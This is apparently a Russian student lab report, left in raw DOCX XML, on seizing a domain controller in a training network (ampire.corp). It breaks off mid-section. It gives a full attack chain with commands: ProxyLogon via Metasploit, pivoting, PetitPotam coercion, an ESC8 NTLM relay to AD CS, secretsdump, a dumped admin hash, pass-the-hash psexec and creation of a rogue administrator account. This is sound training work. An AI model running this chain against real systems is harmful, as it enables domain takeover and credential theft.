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№5-F.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ЗАХВАТ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">КОНТРОЛЛЕРА</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ДОМЕНА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Кибербезопасность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">предприятия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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Хрусталев</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Влад</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Гисматуллин</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Артём</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Чесноков</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Артёмий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Коннова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Татьяна</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нефедова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Наталья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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Бансимба</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Клодели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Получить доступ к контроллеру домена, создать доменного пользователя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, добавить его в локальную группу</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и получить флаг в одном из полей пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Исходные данные:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Атакующая машина (Kali): 195.239.174.11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Целевая сеть: 195.239.174.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Запрещено атаковать: 195.239.174.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Внутренняя доменная сеть: 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Основные цели:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Почтовый сервер Exchange: 195.239.174.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Контроллер домена (AD): 10.10.10.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Центр сертификации (CS): 10.10.10.40</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Домен:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ampire.corp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="24" w:name="этап-1-разведка-и-поиск-вектора-атак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Этап 1: Разведка и поиск вектора атаки</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="сканирование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Сканирование сети</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнено сканирование целевой подсети с помощью</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap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195.239.174.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph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195.239.174.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: порты 25 (SMTP) и 443 (HTTPS) открыты → предполагаемый почтовый сервер Exchange.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195.239.174.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: порты 22 (SSH) и 8888 открыты (атака запрещена).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195.239.174.25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: порт 80 (HTTP) открыт → веб-портал.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="идентификация-exchange-serve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Идентификация Exchange Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Через веб-интерфейс</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://195.239.174.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">подтверждено наличие Microsoft Exchange Server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Определена версия через eDiscovery Export Tool:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">15.1.1713.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Exchange Server 2016 CU12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Найденные уязвимости (CVSS &gt;= 9):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE-2021-26855 (ProxyLogon)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE-2021-34473 (ProxyShell)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="получение-начального-доступ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Получение начального доступа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использована уязвимость</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ProxyLogon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">через Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/windows/http/exchange_proxylogon_rce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lhost 195.239.174.11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rhosts 195.239.174.1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email manager1@ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run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Получена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-сессия на почтовом сервере</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MAIL (10.10.10.10)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="29" w:name="этап-2-внутренняя-разведка-и-подготовк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Этап 2: Внутренняя разведка и подготовка</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="анализ-сетевых-интерфейс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Анализ сетевых интерфейсов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в сессии meterpreter. Обнаружена внутренняя сеть</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="проброс-портов-и-сканирова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Проброс портов и сканирование</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Добавлен маршрут до внутренней сети:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> autoroute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10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сканирование ARP и доменных компьютеров:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24</w:t>
      </w:r>
      <w:r>
        <w:br/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post/windows/gather/enum_ad_computers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружены хосты: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ad.ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(10.10.10.20) – контроллер домена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cs.ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(10.10.10.40) – центр сертификации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fs.ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– файловый сервер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mail.ampire.corp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– почтовый сервер</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="создание-доменного-пользовател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Создание доменного пользователя</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В сессии на почтовом сервере создан пользователь для дальнейшего сканирования:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user /add hack qwe123 /domain</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="настройка-socks-прокс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Настройка SOCKS-прокси</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запущен SOCKS-прокси через Metasploit для туннелирования трафика:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary/server/socks_proxy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srvhost 127.0.0.1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srvport 1081</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="32" w:name="этап-3-поиск-вектора-атаки-через-ad-c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Этап 3: Поиск вектора атаки через AD CS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="30" w:name="сканирование-центра-сертификац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Сканирование центра сертификации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использован</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">certipy-ad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для анализа AD Certificate Services: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certipy-ad find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ad.ampire.corp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hack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'qwe123'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Обнаружена уязвимость</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ESC8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Web Enrollment включён</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Request Disposition = Issue (автовыпуск сертификатов)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="проверка-возможности-атак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Проверка возможности атаки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запущен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">responder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для перехвата NTLM-хешей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">responder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eth0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Проверена работа уязвимости</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PetitPotam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python3 PetitPotam.py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ad.ampire.corp 195.239.174.11 10.10.10.20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Контроллер домена успешно принуждён к аутентификации на атакующей машине.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="36" w:name="этап-4-атака-на-центр-сертификации-esc8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Этап 4: Атака на центр сертификации (ESC8)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="получение-сертификата-через-ntlm-relay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Получение сертификата через NTLM Relay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запущен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ntlmrelayx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для перехвата аутентификации и получения сертификата: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impacket-ntlmrelayx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--smb2support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http://10.10.10.40/certsrv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--adcs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KerberosAuthentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Повторно запущен PetitPotam для принуждения аутентификации контроллера домена.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Получен PKCS#12 сертификат для учётной записи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AD$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(машинной учётной записи контроллера домена).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="получение-tgt-билет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Получение TGT-билета</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использован</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gettgtpkinit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для получения Kerberos TGT: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python3 gettgtpkinit.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-cert-pfx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/AD\$.pfx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-dc-ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.10.20 ampire.corp/ad\$ ticket.ccache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TGT-билет сохранён в файл</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ticket.ccache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="выгрузка-хешей-пользователей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Выгрузка хешей пользователей</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Экспорт переменной окружения для использования Kerberos-билета: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KRB5CCNAME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ticket.ccache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дамп хешей через</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secretsdump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impacket-secretsdump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ad.ampire.corp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-no-pass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-just-dc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Получен NTLM-хеш администратора домена:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator:aad3b435b51404eeaad3b435b51404ee:1b21da9cb62cfcaf16c5dd263255bf6f</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="43" w:name="этап-5-захват-контроллера-домен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Этап 5: Захват контроллера домена</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="получение-сессии-через-psexec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Получение сессии через psexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использован модуль Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/smb/psexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с полученным хешем:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/windows/smb/psexec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smbuser Administrator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smbpass aad3b435b51404eeaad3b435b51404ee:1b21da9cb62cfcaf16c5dd263255bf6f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rhosts 10.10.10.20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lhost 195.239.174.11</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run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Получена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-сессия на контроллере домена.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="создание-пользователя-hacker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Создание пользователя hacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В сессии на контроллере домена:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user /add hacker qwe123</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> localgroup Administrators hacker /add</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user hacker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hacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">создан и добавлен в группу</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В поле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появился флаг:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">35269</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="42" w:name="альтернативный-метод-smbexec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Альтернативный метод: smbexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также использован</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
